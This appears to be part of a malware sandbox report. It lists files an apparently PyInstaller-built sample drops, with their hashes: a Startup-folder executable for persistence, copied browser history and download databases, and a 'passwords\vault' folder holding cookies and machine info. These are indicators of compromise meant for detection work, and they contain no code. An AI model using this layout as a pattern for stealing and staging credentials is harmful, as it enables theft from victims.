C:\Users\Admin\AppData\Local\Temp\_MEI23842\_testinternalcapi.pyd
| MD5 | 061e1a66e8126b876d74382647050e98 |
| SHA1 | 5c87523567f9457d4fbfadeb7e9eae88976ba589 |
| SHA256 | a9bdca1f485b71f1b73ee92a370b9e21d9d01a2ed4d22c5a7a9d2bd43d8843f0 |
| SHA512 | 77fa41723f485b01d9cdd9bfa0942a3171697d396b5b271503f218e1d694d4cd711e5a2dcb056fd62ccd1fe146495cf97703c92d4d9a2177eef4ad4eaac713f9 |
C:\Users\Admin\AppData\Local\Temp\_MEI23842\_testcapi.pyd
| MD5 | 5b7d59037d818c7de124886dea4a6582 |
| SHA1 | 42364599cd533f8e206cfcc79869068576a27c1d |
| SHA256 | f222b4bbb62e814e632ed08239aff96809b306ad94c724c0fd7ab47bf320fc1e |
| SHA512 | deadcea1232ac752ab203454932f6787c3ee7fab247b0f7a7e8657789c3c0192b5484ef77f84f591ab28d51a1b84edf67d883a78f15a83c6d17d242c3e6a7d50 |
C:\Users\Admin\AppData\Local\Temp\_MEI23842\_sqlite3.pyd
| MD5 | 29464d52ba96bb11dbdccbb7d1e067b4 |
| SHA1 | d6a288e68f54fb3f3b38769f271bf885fd30cbf6 |
| SHA256 | 3e96cd9e8abbea5c6b11ee91301d147f3e416ac6c22eb53123eaeae51592d2fe |
| SHA512 | 3191980cdf4ab34e0d53ba18e609804c312348da5b79b7242366b9e3be7299564bc1ec08f549598041d434c9c5d27684349eff0eaa45f8fa66a02dd02f97862b |
C:\Users\Admin\AppData\Local\Temp\_MEI23842\_elementtree.pyd
| MD5 | b479ed301e990690a30fc855e6b45f94 |
| SHA1 | 177b508a602c5662350dae853b5e9db1475908a7 |
| SHA256 | 0c488e6883a70cd54a71a9e28796f87ef6cc0d288260a965cbb24bf1d7309a20 |
| SHA512 | d410355bfe39a7666e7297d3654b0b8dd3919d4ae3bbf7d258acdf76276ecc3ba3718f09ba708e3103d367ea6d352e98b6de265e3746b973b421e0a68b8d37a8 |
C:\Users\Admin\AppData\Local\Temp\_MEI23842\_decimal.pyd
| MD5 | 3055edf761508190b576e9bf904003aa |
| SHA1 | f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890 |
| SHA256 | e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577 |
| SHA512 | 87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248 |
C:\Users\Admin\AppData\Local\Temp\_MEI23842\_cffi_backend.cp312-win_amd64.pyd
| MD5 | fcb71ce882f99ec085d5875e1228bdc1 |
| SHA1 | 763d9afa909c15fea8e016d321f32856ec722094 |
| SHA256 | 86f136553ba301c70e7bada8416b77eb4a07f76ccb02f7d73c2999a38fa5fa5b |
| SHA512 | 4a0e98ab450453fd930edc04f0f30976abb9214b693db4b6742d784247fb062c57fafafb51eb04b7b4230039ab3b07d2ffd3454d6e261811f34749f2e35f04d6 |
C:\Users\Admin\AppData\Local\Temp\_MEI23842\_brotli.cp312-win_amd64.pyd
| MD5 | 9ad5bb6f92ee2cfd29dde8dd4da99eb7 |
| SHA1 | 30a8309938c501b336fd3947de46c03f1bb19dc8 |
| SHA256 | 788acbfd0edd6ca3ef3e97a9487eeaea86515642c71cb11bbcf25721e6573ec8 |
| SHA512 | a166abcb834d6c9d6b25807adddd25775d81e2951e1bc3e9849d8ae868dedf2e1ee1b6b4b288ddfbd88a63a6fa624e2d6090aa71ded9b90c2d8cbf2d9524fdbf |
C:\Users\Admin\AppData\Local\Temp\_MEI23842\zlib1.dll
| MD5 | 297e845dd893e549146ae6826101e64f |
| SHA1 | 6c52876ea6efb2bc8d630761752df8c0a79542f1 |
| SHA256 | 837efb838cb91428c8c0dfb65d5af1e69823ff1594780eb8c8e9d78f7c4b2fc1 |
| SHA512 | f6efef5e34ba13f1dfddacfea15f385de91d310d73a6894cabb79c2186accc186c80cef7405658d91517c3c10c66e1acb93e8ad2450d4346f1aa85661b6074c3 |
C:\Users\Admin\AppData\Local\Temp\_MEI23842\winsound.pyd
| MD5 | f4efde2ca920a52135b00bf8f0545a87 |
| SHA1 | 352e5ea2419ba876fb80e0d0d1e5dd12272a33e4 |
| SHA256 | 9885b3d18903a2ef27428c7c9760493111cc97330ff0afcb57199964092e86bf |
| SHA512 | f098af2851be213f83d19c0aa0ca82ded7bc41f51793502b9bed32d185b73b9cc8a9b29e25b3c5847b237aa466b14088e577f05b6bd03046aa65edb25c087e8d |
C:\Users\Admin\AppData\Local\Temp\_MEI23842\tk86t.dll
| MD5 | 9fb68a0252e2b6cd99fd0cb6708c1606 |
| SHA1 | 60ab372e8473fad0f03801b6719bf5cccfc2592e |
| SHA256 | c6ffe2238134478d8cb1c695d57e794516f3790e211ff519f551e335230de7de |
| SHA512 | f5de1b1a9dc2d71ae27dfaa7b01e079e4970319b6424b44c47f86360faf0b976ed49dab6ee9f811e766a2684b647711e567cbaa6660f53ba82d724441c4ddd06 |
C:\Users\Admin\AppData\Local\Temp\_MEI23842\tcl86t.dll
| MD5 | 21dc82dd9cc445f92e0172d961162222 |
| SHA1 | 73bc20b509e1545b16324480d9620ae25364ebf1 |
| SHA256 | c2966941f116fab99f48ab9617196b43a5ee2fd94a8c70761bda56cb334daa03 |
| SHA512 | 3051a9d723fb7fc11f228e9f27bd2644ac5a0a95e7992d60c757240577b92fc31fa373987b338e6bc5707317d20089df4b48d1b188225ff370ad2a68d5ff7ba6 |
C:\Users\Admin\AppData\Local\Temp\_MEI23842\sqlite3.dll
| MD5 | 612fc8a817c5faa9cb5e89b0d4096216 |
| SHA1 | c8189cbb846f9a77f1ae67f3bd6b71b6363b9562 |
| SHA256 | 7da1c4604fc97ba033830a2703d92bb6d10a9bba201ec64d13d5ccbfecd57d49 |
| SHA512 | 8a4a751af7611651d8d48a894c0d67eb67d5c22557ba4ddd298909dd4fb05f5d010fe785019af06e6ca2e406753342c54668e9c4e976baf758ee952834f8a237 |
memory/1600-1248-0x0000020E118E0000-0x0000020E118E1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fpu874l6h9r6pypx.exe
| MD5 | 0e8ac8c96394c6a523f41e10788dd32d |
| SHA1 | f5d5e6f86f5f12d25d3813406239341e19e2f4b4 |
| SHA256 | d765f74af0a7e3986616b3018fd6190bd389458dcd408f208cb34072ef4eef12 |
| SHA512 | 8a7ff55f0232fe1fbd4b860f82835cf7e1b7ce9d9bc6dcaad92670e811fa599fbb29b9d902db516d9c512a283168d0f71cfe458cd707d0553748adade954c7d4 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0p3xh5ii.333.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2512-2455-0x00000262D7A90000-0x00000262D7AB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\downloads_db_n8y4
| MD5 | f310cf1ff562ae14449e0167a3e1fe46 |
| SHA1 | 85c58afa9049467031c6c2b17f5c12ca73bb2788 |
| SHA256 | e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855 |
| SHA512 | 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad |
C:\Users\Admin\AppData\Local\Temp\xs4afeszfpgj.db
| MD5 | 013b18b14247306181ec7ae01d24aa15 |
| SHA1 | 5ce4cb396bf23585fbcae7a9733fe0f448646313 |
| SHA256 | edb18b52159d693f30ba4621d1e7fd8d0076bfd062e6dda817601c29588bea44 |
| SHA512 | 2035c94569822378b045c0953659d9745b02d798ab08afc6120974b73dd9747bb696571ea83b4780f0590ca9772fc856f79bea29694fe463b1a388337da8bd94 |
C:\Users\Admin\AppData\Local\Temp\7kz4qhj6sm3h.db
| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Local\Temp\history_db_h4w3
| MD5 | 9618e15b04a4ddb39ed6c496575f6f95 |
| SHA1 | 1c28f8750e5555776b3c80b187c5d15a443a7412 |
| SHA256 | a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab |
| SHA512 | f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26 |
C:\Users\Admin\AppData\Roaming\passwords\vault\cookies.txt
| MD5 | ddb1c0ddf045a6bbbc5459de0134ec98 |
| SHA1 | b738894dfa60d34b80ea54f7d0b13466e425ea0d |
| SHA256 | 0703596c828badeb4ab871685950e07e7cb2f351c787e6bb1668141b6cb21949 |
| SHA512 | b7cd779e247f0a85bdd036f05bc30e88cf75213a45538304bb682e26907fc29bdbb4c33330872b55084fdf54b139af29f4d61f9df40892b748606e9feb3f8920 |
C:\Users\Admin\AppData\Roaming\passwords\vault\media\machineinfo.txt
| MD5 | 759cc0bef3bd2884799deb8857191f77 |
| SHA1 | c2215d0fd2505621ff7f1c68e5ee3cc82bdfc60a |
| SHA256 | b75e7ef4bdc9a76ff5708a88cd81e27a131b450c48be6764182e4a03c26ae8e1 |
| SHA512 | b004f9c692f40307506147b7e91a8c470f39c5a8953913b8e45159ea90a977feb665e64c1fe617e46eb62477d28d1acf4481b2e9f89f66e3f19bf10e7c5234dd |